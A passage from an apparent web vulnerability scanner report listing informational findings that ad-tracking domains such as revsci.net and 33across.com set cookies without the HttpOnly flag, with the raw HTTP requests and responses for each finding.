User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_t9sN=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; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsiPus_oJ6I="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"; rsi_us_1000000="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"; 
rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMPwiZi1ff82KhtEfczsj5sp6lx5+8qHgTs7PhiC628AdVlOSeURpAhS+ptW; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_t9sN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:49 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 13:59:49 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:49 GMT; Path=/
Set-Cookie: rtc_bhnH=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:49 GMT; Path=/
X-Proc-ms: 37
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Length: 849

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['B08725_10011','D08734_70008','D08734_72078','B08725_50060','B08725_50578','B08725_50657'];
var rsiExp=new Date((new Date()).getTime()+2
...[SNIP]...

10.93. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_dGQ8=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; udm_0=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; rsiPus_xqR7="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"; rsi_us_1000000="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"; rsi_segs_1000000=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 13:59:45 GMT

GIF89a.............!.......,...........D..;

10.94. http://pix04.revsci.net/I10982/b3/0/3/1003161/448768738.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I10982/b3/0/3/1003161/448768738.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I10982/b3/0/3/1003161/448768738.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.nme.com%252Fnews%252Fsufjan-stevens%252F56527%253F_rsiL%253D0%26DM_EOM%3D1&C=I10982 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_Wdkl=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; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=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; rsiPus_--QM="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"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Wdkl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 14:01:00 GMT; Path=/
Set-Cookie: NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd9c&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 14:01:00 GMT; Path=/
Set-Cookie: rtc_7_f3=MLvn9yUVZjpnpsoVwxtUaAgBXM1ocLKpZkLem1XJimjUNmWkLuW+Q3IYAcHCWGbufeXNaSBtbG5g5lLo7eYML1bRrFjZ8GZkY1DoUVQ3JAFkNwLoqysQx52jEC2lMqa7ifpThxs7FyNvveFNtEn7NSMcJ2SH/j03Jmzm6B9e1KoIieaD6fQiz+SI37JiXn8z7XtHZMFtt272+/QzRcdgnWOdJNCjqAIeNphuktNAVr/HDP/YSOQy3kkr4NUHjvkkUrhr7WbzSfqA1MvgxrBz9iRzXradVJPn0fdOzB0+msOFqupVxy37ALlnnzDoASz2U1OcgEgeG+WV8hzBhWSJXDBRzrKIOwxeaBOhkrCzhdMeGy4zG0FAj/O7/Tu0HXAgyamecYsUt5hoqKvSCuPG66sWNIjOQ09Az4HEmltEiHlQr42e0xSoaGP6pj6u/ug4j6qm9remPZasxkhCsw9rRJ9xzsLQ16/+c7iYQzwO2wI1sFxOFTgcF0rJsrH2RLNC8zcxLWr7KlfpB4ZLpKqqojzY0pJoe6N7Jt9YwmtLLrOAizP57gse9Rf8AI2yMPD3HMDiws58WpQgTmSfCd5s849ALAy0/kJyEC7kKGH5i0xoELx4cqoVQ8sGsuzfEJVNiA2FBxgVaPTkScHKYeuHIbKaLzFeQMqiZqzQCKL2DYQJxKRmfoP6lY/yoowlXy8dWrI2rGMXIzCo4oWBDSOxiHHqc1vo5g0W/Z9+g6YgWZoZ4G8ilolPjmfRgn7f2YPFdUVTixjywHsRBmqnWfr/PD9ehQ8B+t6OIuhGnnKgcA/iX6iaRaDg63Eq9HTcrRpXFVmwrz7VSWUX4sbZYJs7DNbc8J/t7+QY4D/RX/xrzQUR2W1Tn07RWTUTmlXISziIN5UNDQ9c03yJaRCnjVmHY9hAmW6dpVqXeUwbjGOVxwmecpOnbSpTq5xE0CRdxnHf4QStwrBwr/FKMd+a/dBlwEolGm1HvaEG0pICWzDZ2hVeeNJuEhwOZNshSeEUgaPJ879t2sA4qw5UV0j+Uc/IMRHzohx8g8WAIRJTsBuIxSKmpu+dZF8fZTeKv9bgD6eb+qxB4yKhRhen4I/qhGIj1Oci6tXfQjOUl3SzFg8Py4Oa/werp4xtvN1s84DdhcC0lR5fOCLS9b3G7+5aCcNnvrv/8NrCS/jTxyCHoj6vbo6mX1e4X/mjJw18iYOhaB802RsdGuNUg7D+231yHlu7JjTrvjF4++snwjnDi+CXlNxQOXbD7J5T/1z2qnvDRf7JDT4X8vtlPKY4/BdnbD+DpcAImn1g/AbomaIYfPJC6/0PndODqXMddNA6iDqg0WeIYc49DHKdW5OdtG/l11ugUI5rv3Ccbxdj9KbpB64syn6ZNpuyTMEqjmtmryNrax42/C1cTdhfnyeENrLnWHnGSGmfQNDGc4ND4vvSPvv+/1gkpHRWdiKz3v0CdKoxFR2a7pwgDt0NwqyKAwz1S9PYQv7+jHRkMmS09BnmnxT35jy6qxR+h04rxWldh5Nb9tSFd/y3nVbhUpxclD8C3Jf2jy14PUdYBrHSBwobp86iS7Sr0pfxpJ6yYBXqqFvEaacobjsgOaJG5ArH7VjPz+nb/eolY3GQXiZYXpl8rs35wPJx/m/RdY5HFaYpj97Mc+LacQ7fPn4nGXobGuPcdPKLmjpy9e3RaQwhbNH1rI5TWZ6jzhyfYG1T8PMbysEIpJnvca7MpjiwPpTLBaMGft0wmEw5hmow3P2ZAAzZmHGNZMBN; Domain=.revsci.net; Expires=Tue, 08-May-2012 14:01:00 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:01:00 GMT
Content-Length: 671

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3
...[SNIP]...

10.95. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_dGQ8=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; rsiPus_wuF1="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"; rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:43 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:42 GMT
Content-Length: 729

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_72078'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...

10.96. http://pix04.revsci.net/J06575/b3/0/3/1003161/306691632.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/306691632.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/306691632.gif?D=DM_LOC%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages%253Fzipcode%253Dundefined%2526age%253Dnull%2526gender%253Dundefined%2526_rsiL%253D0%26DM_CAT%3Dnewspaper%2520%253E%2520news%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_dGQ8=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; udm_0=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; rsiPus_xqR7="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"; rsi_us_1000000="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"; rsi_segs_1000000=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_dGQ8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mGHo=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd51&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 13:59:45 GMT; Path=/
X-Proc-ms: 13
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 13:59:44 GMT

GIF89a.............!.......,...........D..;

10.97. http://pixel.33across.com/ps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dab4fa85facd099 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1304471552277%3As2.33%3D%2C3390%2C2740%2C

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1304949937737%3As2.33%3D%2C8131%2C4401%2C2751%2C8801%2C8261%2C6571%2C3831%2C7051%2C7651%2C6561%2C7661%2C2740%2C4411%2C9221%2C7671%2C9241%2C8151%2C5481%2C571%2C6581%2C8771%2C7621%2C8291%2C8301%2C6531%2C8171%2C2231%2C8781%2C4381%2C3321%2C7101%2C8311%2C8791%2C5451%2C8181%2C4911%2C7641%2C5441%2C2811%2C3761%2C7591%2C5911%2C2801%2C4472%2C7111%2C3771%2C5431%2C7131%2C5902%2C1051%2C3202%2C5421%2C4451%2C6651%2C4461%2C5411%2C7121%2C8761%2C2791%2C5891%2C6641%2C4941%2C8101%2C8711%2C581%2C8231%2C3741%2C5941%2C7561%2C8111%2C7141%2C4441%2C1061%2C591%2C7161%2C2761%2C8241%2C6621%2C4421%2C5391%2C8721%2C4431%2C601%2C3241%2C5921%2C3721%2C8121%2C7581%2C5381%2C5021%2C3161%2C3711%2C7531%2C8391%2C8001%2C5012%2C7521%2C6111%2C5601%2C6931%2C7541%2C6091%2C6941%2C6461%2C8041%2C5591%2C6951%2C6131%2C8431%2C3193%2C5051%2C6411%2C8421%2C4501%2C5572%2C6961%2C8061%2C4492%2C6421%2C6121%2C7511%2C4481%2C5581%2C8051%2C3171%2C6431%2C2571%2C6971%2C8331%2C6501%2C5552%2C5081%2C201%2C6981%2C2141%2C8871%2C8321%2C6511%2C6991%2C7461%2C4592%2C6041%2C5071%2C7961%2C4581%2C7001%2C8881%2C8341%2C5061%2C6471%2C7011%2C6071%2C231%2C2651%2C5111%2C7971%2C6051%2C7031%2C6481%2C5512%2C7991%2C6491%2C8851%2C6331%2C7891%2C2441%2C3521%2C4071%2C2981%2C8541%2C6321%2C5221%2C9081%2C7901%2C3541%2C8512%2C2461%2C9061%2C7881%2C3551%2C6791%2C2452%2C7381%2C7921%2C4101%2C5192%2C6841%2C5731%2C7931%2C2951%2C6291%2C7391%2C9051%2C3561%2C8551%2C4051%2C6281%2C2491%2C2971%2C7361%2C5211%2C3571%2C4671%2C2481%2C3581%2C7373%2C5751%2C4061%2C2961%2C7831%2C341%2C7351%2C9011%2C8471%2C4681%2C6391%2C9021%2C2501%2C4691%2C6862%2C3071%2C5181%2C7811%2C5171%2C7821%2C3481%2C4031%2C6851%2C6371%2C7341%2C9001%2C3491%2C7861%2C5131%2C6361%2C4711%2C8501%2C7321%2C5121%2C7871%2C8991%2C3501%2C6901%2C8481%2C4721%2C7301%2C7841%2C5151%2C3511%2C5682%2C361%2C7851%2C5141%2C8971%2C5351%2C8671%2C7771%2C4751%2C2311%2C7291%2C4271%2C2851%2C5831%2C9202%2C8661%2C4741%2C951%2C6201%2C7281%2C6661%2C4281%2C2871%2C5842%2C4761%2C61
81%2C5361%2C8641%2C6191%2C7751%2C7261%2C6711%2C8701%2C5861%2C921%2C6171%2C5871%2C3911%2C5321%2C4771%2C8691%2C7251%2C5332%2C4251%2C9162%2C7791%2C6691%2C8682%2C6151%2C431%2C4791%2C6701%2C5881%2C421%2C7781%2C2841%2C9151%2C8601%2C7711%2C3881%2C3341%2C4801%2C7701%2C5771%2C7221%2C5781%2C4351%2C6721%2C9131%2C2932%2C6241%2C7691%2C8591%2C5791%2C4341%2C2941%2C5311%2C7681%2C3351%2C451%2C6733%2C9122%2C3891%2C6771%2C5251%2C3851%2C3362%2C9111%2C6232%2C5261%2C8631%2C5801%2C3841%2C7191%2C971%2C3871%2C9101%2C5811%2C7181%2C2901%2C5271%2C6211%2C7721%2C3390%2C7171%2C961%2C4311%2C6761%2C5821%2C3861%2C9091%2C; Domain=.33across.com; Expires=Tue, 08-May-2012 14:05:37 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:05:37 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

10.98. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

